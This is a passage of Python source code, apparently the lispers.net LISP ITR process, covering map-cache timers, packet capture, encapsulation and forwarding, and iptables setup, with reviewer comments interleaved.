# Display state in an ITR.
#
def lisp_itr_show_command(parameter):
    """CLI handler: display general ITR state via lispconfig."""
    return(lispconfig.lisp_itr_rtr_show_command(parameter, "ITR", []))
#enddef
#
# lisp_itr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_itr_show_keys_command(parameter):
    """CLI handler: display the ITR's crypto-key list."""
    return(lispconfig.lisp_show_crypto_list("ITR"))
#enddef
#
# lisp_itr_show_rloc_probe_command
#
# Display RLOC-probe list state in an ITR.
#
def lisp_itr_show_rloc_probe_command(parameter):
    """CLI handler: display the ITR's RLOC-probe list state."""
    return(lispconfig.lisp_itr_rtr_show_rloc_probe_command("ITR"))
#enddef
#
# lisp_itr_process_timer
#
# This is the ITR's 60-second periodic timer routine. We typically use it
# to time-out map-cache entries. But the one case where we are acting as
# a L2-overlay ITR, we will send Map-Requests to retrieve the broadcast
# entry so we have the latest replication-list before we need it.
#
def lisp_itr_process_timer(lisp_sockets, lisp_ephem_port):
    """
    ITR 60-second periodic timer: flushes per-nonce crypto keys, refreshes
    the L2-overlay broadcast map-cache entry when configured, times out
    map-cache entries, and reschedules itself.
    """
    lisp.lisp_set_exception()

    #
    # Remove nonce entries from crypto-list.
    #
    # NOTE(review): 'del(key)' only unbinds the loop variable -- it does
    # not mutate the stored lists; the dict reset below is what actually
    # drops the state.
    for keys in list(lisp.lisp_crypto_keys_by_nonce.values()):
        for key in keys: del(key)
    #endfor
    lisp.lisp_crypto_keys_by_nonce = {}

    #
    # If doing L2-overlays, get map-cache entry from (0000-0000-0000/0,
    # ffff-ffff-ffff/48).
    #
    if (lisp.lisp_l2_overlay):
        afi = lisp.LISP_AFI_MAC
        iid = lisp.lisp_default_iid
        s = lisp.lisp_address(afi, "0000-0000-0000", 0, iid)
        s.mask_len = 0
        d = lisp.lisp_address(afi, "ffff-ffff-ffff", 48, iid)
        lisp.lisp_send_map_request(lisp_sockets, lisp_ephem_port, s, d, None)
    #endif

    #
    # Timeout Map-Cache entries.
    #
    lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)

    #
    # Restart periodic timer.
    #
    # NOTE(review): assigned without a 'global' statement, so this binds a
    # local name and the module-level lisp_periodic_timer stays stale --
    # harmless as long as nothing cancels this timer, but confirm.
    lisp_periodic_timer = threading.Timer(60, lisp_itr_process_timer,
                                          [lisp_sockets, lisp_ephem_port])
    lisp_periodic_timer.start()
    return
#enddef
#
# lisp_itr_timeout_dynamic_eids
#
# Check to see if dyanmic-EIDs have stop sending data. If so, remove the
# state and stop registering them.
#
def lisp_itr_timeout_dynamic_eids(lisp_socket):
    """
    Periodic check whether dynamic-EIDs have stopped sending data. Timed
    out entries are removed and the ETR process is told (via IPC) so it
    stops registering them. Reschedules itself.
    """
    lisp.lisp_set_exception()

    now = lisp.lisp_get_timestamp()
    for db in lisp.lisp_db_list:
        if (db.dynamic_eid_configured() == False): continue

        delete_list = []
        for dyn_eid in list(db.dynamic_eids.values()):
            ts = dyn_eid.last_packet
            if (ts == None): continue
            # still within the activity window -> keep the entry
            if (ts + dyn_eid.timeout > now): continue

            #
            # Check hardware if dyn-EID has had packets SENT to. We want the
            # opposite but this is all we get from Arista.
            #
            if (lisp.lisp_program_hardware):
                prefix = dyn_eid.dynamic_eid.print_prefix_no_iid()
                if (lisp.lisp_arista_is_alive(prefix)):
                    lisp.lprint(("Hardware indicates dynamic-EID {} " + \
                        "still active").format(lisp.green(prefix, False)))
                    continue
                #endif
            #endif

            #
            # Tell ETR process so it can register dynamic-EID.
            #
            eid_str = dyn_eid.dynamic_eid.print_address()
            ipc = "learn%{}%None".format(eid_str)
            ipc = lisp.lisp_command_ipc(ipc, "lisp-itr")
            lisp.lisp_ipc(ipc, lisp_socket, "lisp-etr")

            lisp.lprint("Dynamic-EID {}".format( \
                lisp.bold(lisp.green(eid_str, False) + " activity timeout",
                False)))
            delete_list.append(eid_str)
        #endfor

        #
        # Remove the timed out entries from db.dynamic_eids{}.
        # (Deferred so the dict is not mutated while being iterated.)
        #
        for eid_str in delete_list: db.dynamic_eids.pop(eid_str)
    #endfor

    #
    # Restart periodic timer.
    #
    threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT,
        lisp_itr_timeout_dynamic_eids, [lisp_socket]).start()
    return
#enddef
#
# lisp_get_active_interfaces
#
# Get interfaces that are plugged in. Including loopback interfaces.
#
# We need to test these 3 types of lines from "ifconfig" output:
#
# aten2 Link encap:Ethernet HWaddr 00:1F:A0:07:0C:04
# eth7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
# en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
#
def lisp_get_active_interfaces():
    """
    Return the names of interfaces that are plugged in, loopbacks
    included. On macOS a fixed list is returned; on Linux the names are
    scraped from 'ifconfig' output, which comes in two formats:

      aten2     Link encap:Ethernet  HWaddr 00:1F:A0:07:0C:04
      eth7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
    """
    if (lisp.lisp_is_macos()): return(["en0", "en1", "lo0"])

    #
    # Probe for the older "Link encap" format first, then fall back to
    # the newer ": flags=" format.
    #
    gs = "Link encap"
    interfaces = getoutput("ifconfig | egrep '{}'".format(gs))
    if (interfaces == ""):
        gs = ": flags="
        interfaces = getoutput("ifconfig | egrep '{}'".format(gs))
    #endif

    #
    # The interface name is everything before the marker, spaces removed.
    #
    return([line.split(gs)[0].replace(" ", "") for line in \
        interfaces.split("\n")])
#enddef
#
# lisp_itr_startup
#
# Intialize this LISP ITR process. This function returns no values.
#
def lisp_itr_startup():
    """
    Initialize the lisp-itr process: discover local addresses, open all
    control/IPC/raw sockets, start the packet-capture setup thread, load
    the map-cache checkpoint and arm the periodic timers. Returns True on
    success, False if local addresses could not be determined.
    """
    global lisp_send_sockets
    global lisp_ipc_listen_socket
    global lisp_ipc_punt_socket
    global lisp_ephem_listen_socket
    global lisp_ephem_nat_socket
    global lisp_raw_socket, lisp_raw_v6_socket

    lisp.lisp_i_am("itr")
    lisp.lisp_set_exception()
    lisp.lisp_print_banner("ITR starting up")

    #
    # Get local address for source RLOC for encapsulation.
    #
    lisp.lisp_get_local_interfaces()
    lisp.lisp_get_local_macs()
    if (lisp.lisp_get_local_addresses() == False): return(False)

    #
    # Open send socket.
    #
    lisp_send_sockets[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4)
    lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
    lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-itr")
    lisp_ipc_punt_socket = lisp.lisp_open_listen_socket("", "lispers.net-itr")
    lisp_send_sockets[2] = lisp_ipc_listen_socket
    # Raspbian lacks usable dual-stack wildcard binding, so fall back to
    # IPv4-only there.
    address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
    lisp_ephem_listen_socket = lisp.lisp_open_listen_socket(address,
        str(lisp_ephem_port))

    #
    # Used on for listening for Info-Replies for NAT-traversal support.
    #
    lisp_ephem_nat_socket = lisp.lisp_open_listen_socket("0.0.0.0",
        str(lisp_ephem_nat_port))

    #
    # Open up raw socket so we can send with IP headers after decapsulation.
    #
    lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
        socket.IPPROTO_RAW)
    lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
    if (lisp.lisp_is_raspbian() == False):
        lisp_raw_v6_socket = socket.socket(socket.AF_INET6, socket.SOCK_RAW,
            socket.IPPROTO_UDP)
    #endif

    #
    # This is used by the ITR to send RTR status change information to the
    # ETR. Since RLOC-probing runs inside the lisp library, when state changes
    # occur, an IPC will have to be sent from the timer thread. This is the
    # only use-case for lisp.lisp_ipc_socket.
    #
    lisp.lisp_ipc_socket = lisp_ipc_listen_socket

    #
    # Start thread that waits for the database-mapping commands to be
    # processed and then sets up packet capture.
    #
    threading.Thread(target=lisp_itr_get_capture_info).start()

    #
    # Load map-cache from checkpoint file before we start writing to it.
    #
    lisp.lisp_load_checkpoint()

    #
    # Should we load-split pings?
    #
    lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None)

    #
    # Start map-cache timeout timer.
    #
    lisp_periodic_timer = threading.Timer(60, lisp_itr_process_timer,
        [lisp_send_sockets, lisp_ephem_port])
    lisp_periodic_timer.start()

    #
    # Start dynamic-EID timeout timer.
    #
    threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT,
        lisp_itr_timeout_dynamic_eids, [lisp_ipc_listen_socket]).start()
    return(True)
#enddef
#
# lisp_itr_count_eid_prefixes
#
# Cound the number of "prefix" sub-commands inside of each "lisp database-
# mapping" command.
#
def lisp_itr_count_eid_prefixes():
    """
    Count the number of "prefix" sub-commands inside of each "lisp
    database-mapping" command clause in ./lisp.config.

    Fix: use a context manager so the file handle is closed even if
    iteration raises (the original leaked the handle on error).
    """
    count = 0
    within = False
    with open("./lisp.config", "r") as f:
        for line in f:
            # track whether we are inside a database-mapping clause
            if (line == "lisp database-mapping {\n"): within = True
            if (line == "}\n"): within = False
            if (within == False): continue

            # indented "prefix {" lines inside the clause are counted
            if (line[0] == " " and line.find("prefix {") != -1): count += 1
        #endfor
    #endwith
    return(count)
#enddef
#
# lisp_itr_get_local_eid_prefixes
#
# Check the number of "lisp database-mapping" commands we will process. Wait
# for them to be processed and only return when all are processed.
#
# Return array of static EID-prefixes and an array of dynamic EID-prefixes.
#
def lisp_itr_get_local_eid_prefixes():
    """
    Block until every "lisp database-mapping" command from lisp.config has
    been processed, then return two arrays: the IPv4/IPv6/MAC EID-prefix
    strings to pcap on, and the subset that are dynamic EID-prefixes.
    """
    #
    # Count the number of "prefix" sub-commands within a "lisp database-
    # mapping" command clause in the lisp.config file.
    #
    count = lisp_itr_count_eid_prefixes()

    #
    # Does user want us to wait longer than a second to check to see if
    # commands are done. If the CPU is going to be busy during startup, the
    # wait-time should be made longer..
    #
    wait_time = os.getenv("LISP_ITR_WAIT_TIME")
    wait_time = 1 if (wait_time == None) else int(wait_time)

    #
    # Wait for database-mapping commands to execute. We need to retrieve
    # EID-prefixes we need to listen on.
    #
    while (count != len(lisp.lisp_db_list)):
        lisp.lprint(("Waiting {} second(s) for {} database-mapping EID-" + \
            "prefixes, {} processed so far ...").format(wait_time, count,
            len(lisp.lisp_db_list)))
        time.sleep(wait_time)
    #endwhile

    #
    # Return each IPv4, IPv6, or MAC EIDs. These are the ones we need to
    # pass to pcap.
    #
    sources = []
    dyn_eids = []
    for db in lisp.lisp_db_list:
        if (db.eid.is_ipv4() or db.eid.is_ipv6() or db.eid.is_mac()):
            eid_str = db.eid.print_prefix_no_iid()
            if (db.dynamic_eid_configured()): dyn_eids.append(eid_str)
            sources.append(eid_str)
        #endif
    #endfor
    return(sources, dyn_eids)
#enddef
#
# lisp_itr_get_capture_info
#
# Thead to wait for database-mapping commands to finish processing so we can
# get local EID-prefixes to be source filters for packet capture.
#
def lisp_itr_get_capture_info():
    """
    Thread body: wait for database-mapping commands to finish processing,
    install kernel filters, build the pcap filter from the local
    EID-prefixes and start one pcap thread per selected interface.
    """
    global lisp_pcap_lock

    lisp.lisp_set_exception()

    #
    # Wait for database-mapping commands to execute. We need to retrieve
    # EID-prefixes we need to listen on.
    #
    sources, dyn_eids = lisp_itr_get_local_eid_prefixes()

    #
    # If "ipc-data-plane = yes" is configured, we do not need to do any
    # data-plane forwarding. There is another module running with the
    # lispers.net control-plane that is doing data-plane forwarding. We'll
    # get punts via the lispers.net-itr named socket. But we do have to
    # packet capture RLOC-probe replies. Also capture multicast Map-Register
    # messages for LISP-Decent.
    #
    cp_pfilter = None
    if (lisp.lisp_ipc_data_plane):
        lisp.lprint(lisp.bold("Data-plane packet capture disabled", False))
        cp_pfilter = "(udp src port 4342 and ip[28] == 0x28)" + \
            " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"

        lisp.lprint("Control-plane capture: '{}'".format(cp_pfilter))
    else:
        lisp.lprint("Capturing packets for source-EIDs {}".format( \
            lisp.green(str(sources), False)))
    #endif
    if (lisp.lisp_pitr): lisp.lprint("Configured for PITR functionality")

    #
    # We want the kernel to handle any packets with source AND destination
    # that matches any EID-prefixes for the site. Any other case, we want
    # the pcap filters to get the packet to this lisp-itr process.
    #
    l2_overlay = lisp.lisp_l2_overlay
    if (l2_overlay == False):
        if (lisp.lisp_is_linux()): lisp_itr_kernel_filter(sources, dyn_eids)
    #endif

    #
    # Build packet capture filter so we get packets for configured source EID-
    # prefixes.
    #
    if (cp_pfilter == None):
        if (lisp.lisp_pitr):
            pfilter = lisp_itr_build_pcap_filter(sources, [], False, True)
        else:
            pfilter = lisp_itr_build_pcap_filter(sources, dyn_eids, l2_overlay,
                False)
        #endif
    else:
        pfilter = cp_pfilter
    #endif

    #
    # User can select which interfaces to pcap on.
    #
    interfaces = lisp_get_active_interfaces()
    pcap_list = os.getenv("LISP_PCAP_LIST")
    if (pcap_list == None):
        us = ""
        rloc_interfaces = []
    else:
        # intersection = EID-facing interfaces; symmetric difference =
        # the remaining (RLOC-facing) interfaces
        eid_interfaces = list(set(pcap_list.split()) & set(interfaces))
        rloc_interfaces = list(set(pcap_list.split()) ^ set(interfaces))
        us = "user-selected "
        lisp.lprint("User pcap-list: {}, active-interfaces: {}".format( \
            pcap_list, interfaces))
        interfaces = eid_interfaces
    #endif

    #
    # Start a pcap thread so we can receive packets from applications on this
    # system. But make sure the device is up on A10 devices. If ethernet MAC
    # capturing, do not listen on non ethernet interfaces.
    #
    mac_capturing = (pfilter.find("ether host") != -1)
    for device in interfaces:
        if (device in ["lo", "lispers.net"] and mac_capturing):
            lisp.lprint(("Capturing suppressed on interface {}, " + \
                "MAC filters configured").format(device))
            continue
        #endif

        #
        # MacOS uses one interface for the RLOC interface as well as the
        # EID interface. We use lo0 for the IPv4 EID and en0 for the IPv6 EID.
        #
        if (lisp.lisp_is_macos()):
            if (device not in ["en0", "lo0"]): continue
        #endif

        args = [device, pfilter, lisp_pcap_lock]
        lisp.lprint("Capturing packets on {}interface {}".format(us, device))
        threading.Thread(target=lisp_itr_pcap_thread, args=args).start()
    #endfor
    if (cp_pfilter): return

    #
    # Start a pcap thread so we can receive RLOC-probe Map-Replies packets on
    # RLOC interfaces. This is only called when LISP_PCAP_LIST is set.
    #
    probe_pfilter = "(udp src port 4342 and ip[28] == 0x28)"
    for device in rloc_interfaces:
        args = [device, probe_pfilter, lisp_pcap_lock]
        lisp.lprint("Capture RLOC-probe replies on RLOC interface {}".format( \
            device))
        threading.Thread(target=lisp_itr_pcap_thread, args=args).start()
    #endfor
    return
#enddef
#
# lisp_itr_shutdown
#
# Shut down this process.
#
def lisp_itr_shutdown():
    """Tear down the lisp-itr process: stop timers, then close every
    socket this process opened."""

    #
    # Stop the periodic Info-Request timer if one is pending.
    #
    if (lisp_itr_info_timer): lisp_itr_info_timer.cancel()

    #
    # Close each socket in turn. The IPC sockets are closed by name; the
    # network sockets take an empty name string.
    #
    socket_table = [
        (lisp_send_sockets[0], ""),
        (lisp_send_sockets[1], ""),
        (lisp_ephem_listen_socket, ""),
        (lisp_ephem_nat_socket, ""),
        (lisp_ipc_listen_socket, "lisp-itr"),
        (lisp_ipc_punt_socket, "lispers.net-itr")
    ]
    for sock, sock_name in socket_table:
        lisp.lisp_close_socket(sock, sock_name)
    #endfor
    return
#enddef
#
# lisp_itr_data_plane
#
# Do map-cache lookup and encapsulate packet.
#
def lisp_itr_data_plane(packet, device, input_interface, macs, my_sa):
    """Forward one captured packet: decode it, look it up in the map-cache,
    and either encapsulate to a remote RLOC, natively forward, or replicate
    along an RLE. 'packet' is the raw frame payload, 'device' the pcap
    interface it arrived on, 'input_interface' the interface derived from
    the source MAC, 'macs' a printable MAC string for logging, and 'my_sa'
    true when the source MAC address belongs to this system."""
    global lisp_send_sockets
    global lisp_ephem_port
    global lisp_raw_socket, lisp_raw_v6_socket
    global lisp_ipc_listen_socket

    #
    # Check RLOC-probe Map-Reply. We need to grab the TTL from IP header.
    #
    orig_packet = packet
    packet, source, port, ttl = lisp.lisp_is_rloc_probe(packet, 1)
    if (orig_packet != packet):
        if (source == None): return
        lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port, ttl)
        return
    #endif

    packet = lisp.lisp_packet(packet)
    if (packet.decode(False, None, None) == None): return

    #
    # For locally source packets from this system, the MAC address may
    # be the default router. Check source to see if assigned to this system,
    # and if so, accept on interface "device".
    #
    if (my_sa): input_interface = device

    #
    # Get instance-ID for incoming interface.
    #
    source_eid = packet.inner_source
    iid = lisp.lisp_get_interface_instance_id(input_interface, source_eid)
    packet.inner_dest.instance_id = iid
    packet.inner_source.instance_id = iid

    #
    # Print some useful header fields and strip outer headers..
    #
    if (macs != ""): macs = ", MACs: " + macs + ","
    packet.print_packet("Receive {}{}".format(device, macs), False)

    #
    # Drop packet if input interface not found based on MAC address used.
    #
    if (device != input_interface and device != "lispers.net"):
        lisp.dprint("Not our MAC address on interface {}, pcap interface {}". \
            format(input_interface, device))
        return
    #endif

    #
    # Initialize db so the secondary-iid check below cannot hit an unbound
    # name when both LISP-Decent and xTR-loopback are in effect.
    #
    db = None

    lisp_decent = lisp.lisp_decent_push_configured
    if (lisp_decent):
        multicast = packet.inner_dest.is_multicast_address()
        local = packet.inner_source.is_local()
        lisp_decent = (local and multicast)
    #endif
    if (lisp_decent == False):
        #
        # Only forward packets from source-EIDs.
        #
        db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)
        if (db == None):
            lisp.dprint("Packet received from non-EID source")
            return
        #endif

        #
        # Check to see if we are doing dynamic-EID discovery.
        #
        if (db.dynamic_eid_configured()):
            i = lisp.lisp_allow_dynamic_eid(input_interface,
                packet.inner_source)
            if (i):
                lisp.lisp_itr_discover_eid(db, packet.inner_source,
                    input_interface, i, lisp_ipc_listen_socket)
            else:
                e = lisp.green(packet.inner_source.print_address(), False)
                lisp.dprint("Disallow dynamic-EID {} on interface {}".format(e,
                    input_interface))
                return
            #endif
        #endif

        if (packet.inner_source.is_local() and
            packet.udp_dport == lisp.LISP_CTRL_PORT): return
    #endif

    #
    # Do input processing for currently supported packet types..
    #
    igmp = False
    if (packet.inner_version == 4):
        igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet)
        if (packet.packet == None): return
        packet.inner_ttl -= 1
    elif (packet.inner_version == 6):
        packet.packet = lisp.lisp_ipv6_input(packet)
        if (packet.packet == None): return
        packet.inner_ttl -= 1
    else:
        packet.packet = lisp.lisp_mac_input(packet.packet)
        if (packet.packet == None): return
        packet.encap_port = lisp.LISP_L2_DATA_PORT
    #endif

    #
    # First check if destination is to any local EID-prefixes from database-
    # mapping commands. In this case, we need to natively forward.
    #
    if (lisp_xtr_loopback == False):
        db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)

        #
        # BUG FIX: the original compared the bound method itself to False
        # ("db.dynamic_eid_configured == False"), which is never true, so
        # packets to local, non-dynamic EID-prefixes were never natively
        # forwarded here. Call the method as done earlier in this function.
        #
        if (db and db.dynamic_eid_configured() == False):
            lisp.dprint(("Packet destined to local EID-prefix {}, " + \
                "natively forwarding").format(db.print_eid_tuple()))
            packet.send_packet(lisp_raw_socket, packet.inner_dest)
            return
        #endif
    #endif

    #
    # Do map-cache lookup.
    #
    mc = lisp.lisp_map_cache_lookup(packet.inner_source, packet.inner_dest)
    if (mc): mc.add_recent_source(packet.inner_source)

    #
    # If "secondary-iid" is configured, we want to check the secondary
    # map-cache if a lookup miss occured in the default IID for this source
    # EID-prefix. If destination EID found in secondary map-cache, use it.
    # Otherwise, send Map-Request for EID in default IID.
    #
    secondary_iid = db.secondary_iid if (db != None) else None
    if (secondary_iid and mc and mc.action == lisp.LISP_NATIVE_FORWARD_ACTION):
        dest_eid = packet.inner_dest
        dest_eid.instance_id = secondary_iid
        mc = lisp.lisp_map_cache_lookup(packet.inner_source, dest_eid)
        if (mc): mc.add_recent_source(packet.inner_source)
    #endif

    #
    # Map-cache lookup miss.
    #
    if (mc == None or lisp.lisp_mr_or_pubsub(mc.action)):
        if (lisp.lisp_rate_limit_map_request(packet.inner_dest)): return
        pubsub = (mc and mc.action == lisp.LISP_SEND_PUBSUB_ACTION)
        lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
            packet.inner_source, packet.inner_dest, None, pubsub)
        if (packet.is_trace()):
            lisp.lisp_trace_append(packet, reason="map-cache miss")
        #endif
        return
    #endif

    #
    # Send Map-Request to see if there is a RLOC change or to refresh an
    # entry that is about to time out.
    #
    if (mc and mc.is_active() and mc.has_ttl_elapsed()):
        if (lisp.lisp_rate_limit_map_request(packet.inner_dest) == False):
            lisp.lprint("Refresh map-cache entry {}".format( \
                lisp.green(mc.print_eid_tuple(), False)))
            lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
                packet.inner_source, packet.inner_dest, None)
        #endif
    #endif

    #
    # Update stats for entry. Stats per RLOC is done in lisp_mapping.select_
    # rloc().
    #
    mc.last_refresh_time = time.time()
    mc.stats.increment(len(packet.packet))

    #
    # Encapsulate, native forward, or encapsulate-and-replicate packet.
    #
    dest_rloc, dest_port, nonce, action, rle, rloc_entry = \
        mc.select_rloc(packet, lisp_ipc_listen_socket)

    if (dest_rloc == None and rle == None):
        if (action == lisp.LISP_NATIVE_FORWARD_ACTION):
            lisp.dprint("Natively forwarding")
            packet.send_packet(lisp_raw_socket, packet.inner_dest)
            if (packet.is_trace()):
                lisp.lisp_trace_append(packet, reason="not an EID")
            #endif
            return
        #endif
        r = "No reachable RLOCs found"
        lisp.dprint(r)
        if (packet.is_trace()): lisp.lisp_trace_append(packet, reason=r)
        return
    #endif
    if (dest_rloc and dest_rloc.is_null()):
        r = "Drop action RLOC found"
        lisp.dprint(r)
        if (packet.is_trace()): lisp.lisp_trace_append(packet, reason=r)
        return
    #endif

    #
    # Setup outer header for either unicast or multicast transmission..
    #
    packet.outer_tos = packet.inner_tos
    packet.outer_ttl = 32 if (igmp) else packet.inner_ttl

    #
    # Do unicast encapsulation.
    #
    if (dest_rloc):
        packet.outer_dest.copy_address(dest_rloc)
        version = packet.outer_dest.afi_to_version()
        packet.outer_version = version
        source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
            lisp.lisp_myrlocs[1]
        packet.outer_source.copy_address(source_rloc)

        if (packet.is_trace()):
            if (lisp.lisp_trace_append(packet, rloc_entry=rloc_entry) \
                == False): return
        #endif

        #
        # Encode new LISP, UDP, and outer header.
        #
        if (packet.encode(nonce) == None): return
        if (len(packet.packet) <= 1500): packet.print_packet("Send", True)

        #
        # Send out on raw socket.
        #
        raw_socket = lisp_raw_v6_socket if version == 6 else lisp_raw_socket
        packet.send_packet(raw_socket, packet.outer_dest)

    elif (rle):
        #
        # Do replication of RLE is returned. Since we are an ITR, replicate to
        # level-0 RTRs (or ETRs) only (or first-level boxes only)..
        #
        level = rle.rle_nodes[0].level
        orig_len = len(packet.packet)
        for node in rle.rle_forwarding_list:
            if (node.level != level): return

            packet.outer_dest.copy_address(node.address)
            if (lisp_decent): packet.inner_dest.instance_id = 0xffffff
            version = packet.outer_dest.afi_to_version()
            packet.outer_version = version
            source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
                lisp.lisp_myrlocs[1]
            packet.outer_source.copy_address(source_rloc)

            if (packet.is_trace()):
                if (lisp.lisp_trace_append(packet) == False): return
            #endif

            if (packet.encode(None) == None): return

            #
            # Replicate out on raw socket.
            #
            packet.print_packet("Replicate-to-L{}".format(node.level), True)
            packet.send_packet(lisp_raw_socket, packet.outer_dest)

            #
            # We need to strip the encapsulation header so we can add a new
            # one for the next replication.
            #
            strip_len = len(packet.packet) - orig_len
            packet.packet = packet.packet[strip_len::]
        #endfor
    #endif

    #
    # Don't need packet structure anymore.
    #
    del(packet)
    return
#enddef
#
# lisp_itr_pcap_process_packet
#
# Receive LISP encapsulated packet from pcap.loop().
#
def lisp_itr_pcap_process_packet(device, not_used, packet):
    """pcap callback: strip the link-layer header from 'packet' and hand the
    IP payload to lisp_itr_data_plane(). 'device' is the capture interface;
    'not_used' is the unused pcap header argument."""

    #
    # Link-header length: 4 bytes on MacOS loopback (lo0), 0 on the raw
    # lispers.net device, otherwise a 14-byte ethernet header.
    #
    offset = 4 if device == "lo0" else 0 if device == "lispers.net" else 14
    if (lisp.lisp_frame_logging):
        title = lisp.bold("Received frame on interface '{}'".format(device),
            False)
        frame = lisp.lisp_format_packet(packet[0:64])
        lisp.lprint("{}: {}".format(title, frame))
    #endif

    #
    # Get input interface based on source MAC address.
    #
    macs = ""
    my_sa = False
    interface = device
    if (offset == 14):
        interfaces, sa, da, my_sa = lisp.lisp_get_input_interface(packet)
        interface = device if (device in interfaces) else interfaces[0]
        macs = lisp.lisp_format_macs(sa, da)
        if (interface.find("vlan") != -1): offset +=4

        #
        # If destination MAC address is multicast, set my_sa. Examine low-order
        # bit of first byte by grabbing the second nibble and testing low-order
        # bit after converting to integer.
        #
        if (int(da[1], 16) & 1): my_sa = True
    #endif

    #
    # Check for VLAN encapsulation.
    #
    if (offset != 0):
        # Ethertype sits in the last two bytes of the link header.
        ethertype = struct.unpack("H", packet[offset-2:offset])[0]
        ethertype = socket.ntohs(ethertype)
        if (ethertype == 0x8100):
            # 802.1Q tag: derive the vlan interface name and skip the tag.
            vlan = struct.unpack("I", packet[offset:offset+4])[0]
            vlan = socket.ntohl(vlan)
            interface = "vlan" + str(vlan >> 16)
            offset += 4
        elif (ethertype == 0x806):
            lisp.dprint("Dropping ARP packets, host should have default route")
            return
        #endif
    #endif

    # L2-overlays forward the whole frame including the MAC header.
    if (lisp.lisp_l2_overlay): offset = 0

    lisp_itr_data_plane(packet[offset::], device, interface, macs, my_sa)
    return
#enddef
#
# lisp_itr_kernel_filter
#
# Supplied 'sources' array are the EID-prefixes we want the kernel to drop
# packets for. We will use iptables for Linux and ipfw for MacOS.
#
# We need this address combination support (notation S -> D):
#
# site-EID -> remote-EID processed by ITR
# site-EID -> non-EID processed by ITR
# site-EID -> site-EID processed by kernel
# non-EID -> non-EID processed by kernel
# non-EID -> remote-EID processed by kernel
# non-EID -> site-EID processed by kernel
#
# The pcap filters reflect the ITR processing combos and can be found in
# lisp_itr_build_pcap_filter(). This routine programs iptables to do the
# kernel processing combos.
#
# (1) iptables -t raw -A lisp -j ACCEPT -d <special-addresses>
# (2) iptables -t raw -A lisp -j ACCEPT -d <local-address> ...
# (3) iptables -t raw -A lisp -j ACCEPT -s <site-eid> -d <site-eid> ...
# (4) iptables -t raw -A lisp -j DROP -s <site-eid> ...
#
# (1) and (2), we want kernel to route packets. This allows loopback and
# multicast to be processed by kernel.
#
# For (3), we want the kernel to do local routing of packets inside of a site
# in this ITR.
#
# For (4), we want kernel to not touch any packets sourced from locally
# configured EIDs. That is each EID-prefix from a "lisp database-mapping"
# command. Because those EID-prefixes are pcap'ed and process by the lisp-itr
# process.
#
def lisp_itr_kernel_filter(sources, dyn_eids):
    """Install iptables/ip6tables rules (Linux) so the kernel drops packets
    sourced from configured EID-prefixes ('sources') while still routing
    local, intra-site, and non-EID traffic. 'dyn_eids' are dynamic
    EID-prefixes that are excluded from the intra-site ACCEPT rules.
    See the header comment above for the full rule plan."""

    # Escape hatch: operator can suppress all kernel rule installation.
    if (os.getenv("LISP_NO_IPTABLES") != None):
        lisp.lprint("User selected to suppress installing iptables rules")
        return
    #endif

    # Create a dedicated "lisp" chain and jump to it from PREROUTING.
    os.system("sudo iptables -t raw -N lisp")
    os.system("sudo iptables -t raw -A PREROUTING -j lisp")
    os.system("sudo ip6tables -t raw -N lisp")
    os.system("sudo ip6tables -t raw -A PREROUTING -j lisp")

    #
    # Have kernel process packets for local addresses when sourced from site
    # EIDs. We do not want the lisp-itr process to process such packets.
    # We want the kernel to deliver packets to and from local applications.
    # And we want the kernel to forward decapsulated packets out interfaces
    # leading the EIDs.
    #
    add = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}"
    addr_set = ["127.0.0.1", "::1", "224.0.0.0/4 -p igmp", "ff00::/8",
        "fe80::/16"]
    addr_set += sources + lisp.lisp_get_all_addresses()
    for addr in addr_set:
        if (lisp.lisp_is_mac_string(addr)): continue
        # Choose iptables vs ip6tables by address family.
        six = "" if addr.find(":") == -1 else "6"
        os.system(add.format(six, addr))
    #endfor

    #
    # When source and destination addresses are EIDs for this LISP site,
    # we want the kernel to do local routing. But as a PITR, we don't want
    # the kernel to route everything (EID-prefix 0.0.0.0/0) or we can't have
    # this process encapsulate for any source address to a destination EID.
    #
    if (lisp.lisp_pitr == False):
        add = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}"
        check = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}"
        for source in sources:
            if (lisp.lisp_is_mac_string(source)): continue
            if (source in dyn_eids): continue
            six = "" if source.find(":") == -1 else "6"
            for s in sources:
                if (lisp.lisp_is_mac_string(s)): continue
                if (s in dyn_eids): continue
                # Skip cross-family source/destination combinations.
                if (s.find(".") != -1 and source.find(".") == -1): continue
                if (s.find(":") != -1 and source.find(":") == -1): continue

                # "iptables -C" is silent when the rule already exists,
                # so empty output means skip the duplicate add.
                if (getoutput(check.format(six, source, s)) == ""):
                    continue
                #endif
                os.system(add.format(six, source, s))
            #endfor
        #endfor
    #endif

    #
    # Now put in drop rules for each "lisp database-mapping" EID-prefix.
    #
    drop = "sudo ip{}tables -t raw -A lisp -j DROP -s {}"
    for source in sources:
        if (lisp.lisp_is_mac_string(source)): continue
        six = "" if source.find(":") == -1 else "6"
        os.system(drop.format(six, source))
    #endif

    #
